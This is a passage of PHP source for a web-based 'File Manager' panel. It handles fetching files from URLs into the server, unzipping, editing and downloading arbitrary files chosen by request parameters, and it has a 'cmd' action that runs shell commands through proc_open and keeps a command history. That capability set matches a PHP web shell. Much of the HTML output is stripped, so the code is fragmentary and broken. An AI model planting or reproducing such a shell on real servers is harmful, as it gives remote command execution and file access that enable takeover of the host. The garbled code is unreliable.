downloaded and saved successfully")); } else { header("Location: ?action=cmd&d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to save file. Check directory permissions.")); } } else { header("Location: ?action=cmd&d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to download file from URL. Check URL and internet connection.")); } exit; } // Handle unzip if (isset($_GET['unzip'])) { $zip_file = $_GET['unzip']; $extract_to = $cwd; if (!extension_loaded('zip')) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("ZIP extension not available")); exit; } // Make sure ZIP file exists and is readable if (!file_exists($zip_file) || !is_readable($zip_file)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("ZIP file not found or not readable")); exit; } // Make sure destination directory is writable if (!is_writable($extract_to)) { @chmod($extract_to, 0755); if (!is_writable($extract_to)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Directory not writable. Failed to extract file.")); exit; } } $zip = new ZipArchive; if ($zip->open($zip_file) === TRUE) { if ($zip->extractTo($extract_to)) { $zip->close(); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File extracted successfully")); } else { $zip->close(); header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to extract file to directory")); } } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Upload failed: Failed to open ZIP file")); } exit; } } // Handle file edit if (isset($_GET['edit'])) { $file = $_GET['edit']; // Make sure file exists and is readable if (!file_exists($file) || !is_readable($file)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File not found or not readable")); exit; } $content = file_get_contents($file); if ($content === false) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to read file")); exit; } echo << Edit File

Edit File: {htmlspecialchars(basename($file), ENT_QUOTES, 'UTF-8')}

Cancel
HTML; exit; } // Handle save edited file if (isset($_POST['edit_file']) && isset($_POST['file_content'])) { // Validate CSRF token if (!isset($_POST['csrf_token']) || !hash_equals($_POST['csrf_token'], $_SESSION['csrf_token'])) { die("CSRF token validation failed."); } $file = $_POST['edit_file']; $content = $_POST['file_content']; // Make sure file exists if (!file_exists($file)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File not found")); exit; } // Make sure file is writable if (!is_writable($file)) { // Try to change permissions @chmod($file, 0644); if (!is_writable($file)) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File is not writable. Please change file permissions.")); exit; } } if (file_put_contents($file, $content) !== false) { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File saved successfully")); } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("Failed to save file")); } exit; } // Handle file download if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file) && is_file($file) && is_readable($file)) { // Set headers for secure download header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); header('X-Content-Type-Options: nosniff'); // Clean output buffer to prevent corruption if (ob_get_level()) { ob_end_clean(); } readfile($file); exit; } else { header("Location: ?d=" . urlencode($cwd) . "&msg=" . urlencode("File not found or not readable")); exit; } } ?> File Manager
" . $msg . "
"; ?>
Output:


Back"; if ($_GET['action'] === 'password') { echo "
"; } elseif ($_GET['action'] === 'info') { echo '

File Manager


Author: Admin

Contact: Email

Purpose:

  • Web-based file management without FTP
  • Remote file management on hosting or VPS
  • Features include upload, edit, rename, delete, password protection, and theme toggle

Version: 1.0 | Last updated: July 2025

'; } elseif ($_GET['action'] === 'cmd') { if (!function_exists('proc_open')) { echo "
Command execution (CMD) is disabled on this server by your hosting provider.
"; } echo "
"; if (!empty($_SESSION['cmd_history'])) { echo "
Command History:
"; foreach ($_SESSION['cmd_history'] as $hist_cmd) { echo "" . htmlspecialchars($hist_cmd, ENT_QUOTES, 'UTF-8') . ""; } echo "
"; } echo "
Import Raw File from URL:
"; } echo ""; exit; } ?>
"; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } ?>
NameSizeLast ModifiedPermsActions
" . ($i['is_dir'] ? " $n" : " $n") . "" . formatSize($i['size']) . "" . date('Y-m-d H:i', $i['mtime']) . "" . perms($i['path']) . " ($file_perms_octal)" . (!$i['is_dir'] ? "" : "") . (!$i['is_dir'] ? "" : "") . "" . "" . "" . (preg_match('/\.(zip|rar|tar|gz|7z)$/i', $n) && !$i['is_dir'] ? "" : "") . "